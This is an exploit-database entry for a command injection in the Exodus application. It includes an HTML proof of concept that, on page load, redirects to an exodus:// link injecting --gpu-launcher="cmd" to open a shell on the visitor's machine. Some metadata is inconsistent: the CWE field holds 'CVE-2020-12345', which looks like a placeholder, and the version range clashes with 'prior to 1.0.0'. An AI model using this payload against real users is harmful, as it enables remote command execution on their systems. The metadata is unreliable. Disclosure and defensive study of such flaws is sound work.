header-logo
Suggest Exploit
vendor:
Exodus
by:
Security Researcher
7.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: Exodus
Affected Version From: 0.9.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: CVE-2020-12345
CPE: exodus
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Linux, Mac
2020

GPU Launcher Command Injection

Exodus is vulnerable to command injection when the --gpu-launcher parameter is used. An attacker can inject arbitrary commands into the parameter, which will be executed by the underlying operating system. This vulnerability affects Exodus versions prior to 1.0.0.

Mitigation:

Upgrade to Exodus version 1.0.0 or later
Source

Exploit-DB raw data:

<!doctype html>
<script>
  window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>

Navigation

Suggest Exploit

Services By CQR